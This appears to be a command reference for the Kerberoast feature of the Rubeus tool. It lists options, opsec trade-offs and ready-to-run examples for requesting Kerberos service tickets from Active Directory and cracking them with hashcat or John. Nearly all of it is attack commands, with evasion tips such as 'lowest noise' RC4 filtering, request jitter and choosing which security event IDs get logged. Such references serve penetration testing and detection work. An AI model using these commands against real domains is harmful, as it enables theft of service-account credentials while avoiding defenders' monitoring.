kerberoast

Request service tickets for accounts with SPNs set and output crackable hashes. Replaces SharpRoast.

Usage

Rubeus.exe kerberoast [[/spn:"<spn>"] | [/spns:<file>]] [/user:<username>] [/domain:<domain>] [/dc:<dc-ip>] [/ou:"OU=..."] [/ldaps] [/nowrap] [/outfile:<output>] [/simple] [/aes] [/rc4opsec] [/tgtdeleg] [/ticket:<ticket>] [/stats] [/creduser:<domain>\<username>] [/credpassword:<password>] [/ldapfilter:<filter>] [/pwdsetafter:MM-dd-yyyy] [/pwdsetbefore:MM-dd-yyyy] [/resultlimit:<n>] [/delay:<ms>] [/jitter:<pct>] [/enterprise] [/autoenterprise] [/nopreauth:<username>]

Options

/spn:"<spn>" — target a single SPN
/spns:<file> — file or comma-separated list of SPNs
/user:<username> — roast a specific user
/domain:<domain> — target domain (default: current)
/dc:<dc-ip> — domain controller
/ou:"OU=..." — restrict to specific OU
/ldaps — use LDAPS (port 636) for queries
/outfile:<output> — write hashes to file
/simple — output hashes only, no metadata
/nowrap — don't line-wrap
/ticket:<ticket> — use existing TGT for roasting (no LDAP needed — works from non-domain-joined)
/tgtdeleg — get TGT via tgtdeleg trick; forces RC4 for AES accounts
/rc4opsec — use tgtdeleg, filter to RC4-only accounts (lowest noise)
/aes — target AES-enabled accounts, request AES tickets
/stats — show statistics only, no ticket requests
/creduser:<domain>\<username> — alternate LDAP credentials
/credpassword:<password> — password for alternate credentials
/ldapfilter:<filter> — append custom LDAP filter (e.g. admincount=1)
/pwdsetafter:MM-dd-yyyy — only accounts with password set after date
/pwdsetbefore:MM-dd-yyyy — only accounts with password set before date
/resultlimit:<n> — limit number of results
/delay:<ms> — milliseconds between TGS requests
/jitter:<pct> — % jitter on delay (1-100)
/enterprise — treat SPNs as enterprise principals (user@domain)
/autoenterprise — auto-retry with enterprise principal on SPN failure
/nopreauth:<username> — send AS-REQ instead of TGS-REQ (generates 4768 not 4769)

Opsec Comparison

Flag(s)	Behavior
(none)	`KerberosRequestorSecurityToken` method, highest supported enctype
`/tgtdeleg`	GSS-API TGT, request RC4 for AES accounts
`/ticket:<ticket>`	Use supplied TGT, request RC4
`/rc4opsec`	tgtdeleg + filter to RC4-only accounts
`/aes`	Request AES tickets via `KerberosRequestorSecurityToken`
`/aes /tgtdeleg`	tgtdeleg + AES accounts + AES tickets
`/nopreauth:<user>`	AS-REQ not TGS-REQ — 4768 vs 4769 events

Examples

# Roast all kerberoastable users (default)
Rubeus.exe kerberoast

# Roast all, output to file
Rubeus.exe kerberoast /outfile:<output>

# Roast specific user
Rubeus.exe kerberoast /user:<username> /simple /nowrap

# Roast with existing TGT (from non-domain-joined host)
Rubeus.exe kerberoast /ticket:<ticket> /spn:"<spn>" /dc:<dc-ip>

# Opsec roasting (RC4-only accounts, tgtdeleg TGT)
Rubeus.exe kerberoast /rc4opsec /nowrap

# AES roasting
Rubeus.exe kerberoast /aes /nowrap

# Custom LDAP filter (admin accounts only)
Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# Filter by password age, limit results
Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5

# Rate-limited roasting
Rubeus.exe kerberoast /delay:5000 /jitter:30

# Cross-domain
Rubeus.exe kerberoast /domain:<domain> /nowrap

# With alternate creds
Rubeus.exe kerberoast /creduser:<domain>\<username> /credpassword:<password>

# Stats only (no ticket requests)
Rubeus.exe kerberoast /stats

# Nopreauth-based roasting (AS-REQ)
Rubeus.exe kerberoast /spn:"<spn>" /nopreauth:<username> /domain:<domain> /dc:<dc-ip>

Crack Hashes

# Hashcat
hashcat -m 13100 hashes.txt wordlist.txt    # RC4 ($krb5tgs$23$)
hashcat -m 19600 hashes.txt wordlist.txt    # AES128 ($krb5tgs$17$)
hashcat -m 19700 hashes.txt wordlist.txt    # AES256 ($krb5tgs$18$)

# John
john --wordlist=wordlist.txt hashes.txt